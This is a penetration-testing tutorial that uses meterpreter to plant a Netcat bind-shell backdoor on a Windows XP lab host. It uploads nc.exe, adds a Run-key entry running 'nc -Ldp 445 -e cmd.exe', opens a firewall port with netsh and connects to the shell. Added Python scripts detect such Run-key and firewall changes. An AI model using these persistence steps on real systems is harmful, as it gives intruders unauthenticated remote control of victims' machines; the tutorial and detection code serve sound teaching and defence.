In this example, instead of querying information on the remote system, we install a Netcat backdoor. This involves changes to the system registry and the firewall.
First, we must upload a copy of Netcat to the remote system.
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
[*] uploading : /usr/share/windows-binaries/nc.exe -> C:\windows\system32
[*] uploaded : /usr/share/windows-binaries/nc.exe -> C:\windows\system32nc.exe
Next, we use the registry to have netcat execute at startup and listen on port 445. We do this by editing the key 'HKLM\software\microsoft\windows\currentversion\run'.
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run
Values (3):
VMware Tools
VMware User Process
quicktftpserver
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'
Successful set nc.
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Key: HKLM\software\microsoft\windows\currentversion\Run
Name: nc
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe
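From the defender's side, the Run-key entry just written is exactly the kind of autostart value an endpoint audit should surface. The following Python script is an added example, not part of the original tutorial or of Metasploit: it parses the `reg queryval`-style output shown above, then audits a constructed set of Run-key values (the three pre-existing value names come from the `reg enumkey` listing, but their command-line data is assumed) and flags any that launch a netcat variant, combine listener flags with `-e`, or hand a command interpreter to another program.

```python
import ntpath

# Constructed sample of what `reg queryval` printed for the value added above.
SAMPLE_QUERYVAL = r"""Key: HKLM\software\microsoft\windows\currentversion\Run
Name: nc
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe
"""

# Constructed Run-key contents: value names as enumerated on the page, command
# lines for the three benign entries are assumed for illustration.
SAMPLE_RUN_ENTRIES = {
    "VMware Tools": r'"C:\Program Files\VMware\VMware Tools\VMwareTray.exe"',
    "VMware User Process": r'"C:\Program Files\VMware\VMware Tools\VMwareUser.exe"',
    "quicktftpserver": r'"C:\Program Files\QuickTFTP\quicktftpserver.exe"',
    "nc": r"C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe",
}

NETCAT_NAMES = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}
SHELL_NAMES = {"cmd.exe", "cmd", "powershell.exe", "powershell"}


def parse_queryval(text):
    """Turn 'Key: ...' / 'Name: ...' / 'Data: ...' lines into a dict."""
    fields = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return fields


def split_command(data):
    """Split a Run-value command line into argv, honouring a double-quoted executable path."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        if end == -1:
            return [data.strip('"')]
        return [data[1:end]] + data[end + 1:].split()
    return data.split()


def expand_flags(args):
    """Expand combined single-dash switches such as -Ldp into individual letters."""
    flags = set()
    for arg in args:
        if len(arg) > 1 and arg[0] == "-" and arg[1:].isalpha():
            flags.update(arg[1:])
    return flags


def audit_run_value(name, data):
    """Return a list of reasons this autostart entry looks like a bind-shell backdoor."""
    argv = split_command(data)
    if not argv:
        return []
    reasons = []
    exe = ntpath.basename(argv[0]).lower()
    if exe in NETCAT_NAMES:
        reasons.append(f"{name}: executable {exe!r} is a netcat variant")
    flags = expand_flags(argv[1:])
    if "e" in flags and ("l" in flags or "L" in flags):
        reasons.append(f"{name}: listener flag (-l/-L) combined with -e, bind-shell pattern")
    if any(ntpath.basename(arg).lower() in SHELL_NAMES for arg in argv[1:]):
        reasons.append(f"{name}: passes a command interpreter as an argument")
    return reasons


def audit_run_entries(entries):
    """Audit every Run-key value; return only the suspicious ones with their reasons."""
    findings = {}
    for name, data in entries.items():
        reasons = audit_run_value(name, data)
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    queried = parse_queryval(SAMPLE_QUERYVAL)
    print("queried value:", queried["Name"], "->", queried["Data"])
    for name, reasons in audit_run_entries(SAMPLE_RUN_ENTRIES).items():
        for reason in reasons:
            print("SUSPICIOUS", reason)
```

The heuristics are deliberately narrow (netcat file names, the listen-plus-execute flag combination, a shell passed as an argument) so the output stays readable; in practice the same audit would be run against every autostart location, not just HKLM\...\Run.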
Next, we need to alter the system so that remote connections to our Netcat backdoor are allowed through the firewall. We open an interactive command prompt and use the 'netsh' command to make the changes, since it is far less error-prone than editing the registry directly. Moreover, the process shown should work across more versions of Windows, because registry locations and functions are highly version- and patch-level dependent.
meterpreter > execute -f cmd -i
Process 1604 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Jim\My Documents > netsh firewall show opmode
Netsh firewall show opmode
Domain profile configuration:
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Local Area Connection firewall configuration:
-------------------------------------------------------------------
Operational mode = Enable
We open port 445 in the firewall and double-check that the setting took effect.
C:\Documents and Settings\Jim\My Documents > netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
Ok.
C:\Documents and Settings\Jim\My Documents > netsh firewall show portopening
netsh firewall show portopening
Port configuration for Domain profile:
Port Protocol Mode Name
-------------------------------------------------------------------
139 TCP Enable NetBIOS Session Service
445 TCP Enable SMB over TCP
137 UDP Enable NetBIOS Name Service
138 UDP Enable NetBIOS Datagram Service
Port configuration for Standard profile:
Port Protocol Mode Name
-------------------------------------------------------------------
445 TCP Enable Service Firewall
139 TCP Enable NetBIOS Session Service
445 TCP Enable SMB over TCP
137 UDP Enable NetBIOS Name Service
138 UDP Enable NetBIOS Datagram Service
C:\Documents and Settings\Jim\My Documents >
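The `netsh firewall show portopening` listing above is also the defender's evidence: the Standard profile now carries a second TCP 445 rule with an unfamiliar name. The Python script below is an added example, not from the original tutorial or from Metasploit; it parses that listing (embedded here as a string taken from the session above), compares each profile against a baseline of expected exceptions (the baseline set is an assumption for this host), and reports both rules missing from the baseline and duplicate rules for the same port and protocol.

```python
import re
from collections import defaultdict

# The portopening listing printed in the session above, embedded verbatim.
NETSH_OUTPUT = """Port configuration for Domain profile:
Port Protocol Mode Name
-------------------------------------------------------------------
139 TCP Enable NetBIOS Session Service
445 TCP Enable SMB over TCP
137 UDP Enable NetBIOS Name Service
138 UDP Enable NetBIOS Datagram Service
Port configuration for Standard profile:
Port Protocol Mode Name
-------------------------------------------------------------------
445 TCP Enable Service Firewall
139 TCP Enable NetBIOS Session Service
445 TCP Enable SMB over TCP
137 UDP Enable NetBIOS Name Service
138 UDP Enable NetBIOS Datagram Service
"""

# Assumed baseline of exceptions this host is expected to have.
BASELINE = {
    (139, "TCP", "NetBIOS Session Service"),
    (445, "TCP", "SMB over TCP"),
    (137, "UDP", "NetBIOS Name Service"),
    (138, "UDP", "NetBIOS Datagram Service"),
}

PROFILE_RE = re.compile(r"^Port configuration for (\w+) profile:")
ENTRY_RE = re.compile(r"^(\d+)\s+(TCP|UDP)\s+(\w+)\s+(.+?)\s*$")


def parse_portopening(text):
    """Return {profile: [(port, proto, mode, name), ...]} from netsh output."""
    profiles = defaultdict(list)
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        match = PROFILE_RE.match(line)
        if match:
            current = match.group(1)
            continue
        match = ENTRY_RE.match(line)
        if match and current:
            port, proto, mode, name = match.groups()
            profiles[current].append((int(port), proto, mode, name))
    return dict(profiles)


def find_unexpected(profiles, baseline=BASELINE):
    """Flag enabled exceptions outside the baseline and duplicate rules per port/protocol."""
    findings = []
    for profile, entries in profiles.items():
        names_by_socket = defaultdict(list)
        for port, proto, mode, name in entries:
            if mode.lower() == "enable" and (port, proto, name) not in baseline:
                findings.append((profile, port, proto, name, "not in baseline"))
            names_by_socket[(port, proto)].append(name)
        for (port, proto), names in names_by_socket.items():
            if len(names) > 1:
                findings.append((profile, port, proto, " / ".join(names),
                                 "duplicate rule for same port"))
    return findings


if __name__ == "__main__":
    for finding in find_unexpected(parse_portopening(NETSH_OUTPUT)):
        print("ALERT", *finding)
```

Diffing against a baseline is what makes the added exception visible: the port itself (445) is legitimately open for SMB, so a port-only check would pass, while the rule name and the duplicate entry do not.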
So, with everything in place, we reboot the remote system and test the Netcat shell.
root@kali:~# nc -v 172.16.104.128 445
172.16.104.128: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [172.16.104.128] 445 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Jim > dir
dir
Volume in drive C has no label.
Volume Serial Number is E423-E726
Directory of C:\Documents and Settings\Jim
05/03/2017  01:43 AM    <DIR>          .
05/03/2017  01:43 AM    <DIR>          ..
05/03/2017  01:26 AM                 0 ;i
05/12/2017  10:53 PM    <DIR>          Desktop
10/29/2016  05:55 PM    <DIR>          Favorites
05/12/2017  10:53 PM    <DIR>          My Documents
05/03/2017  01:43 AM                 0 QCY
10/29/20016 03:51 AM    <DIR>          Start Menu
05/03/2017  01:25 AM                 0 talltelnet.log
05/03/2017  01:25 AM                 0 talltftp.log
               4 File(s)              0 bytes
               6 Dir(s)  35,540,791,296 bytes free
C:\Documents and Settings\Jim >
Wonderful! In a real-world situation we would not use a backdoor this simple, with no authentication or encryption, but the principles of this process remain the same for other changes to the system and for other kinds of programs one might want to run at startup.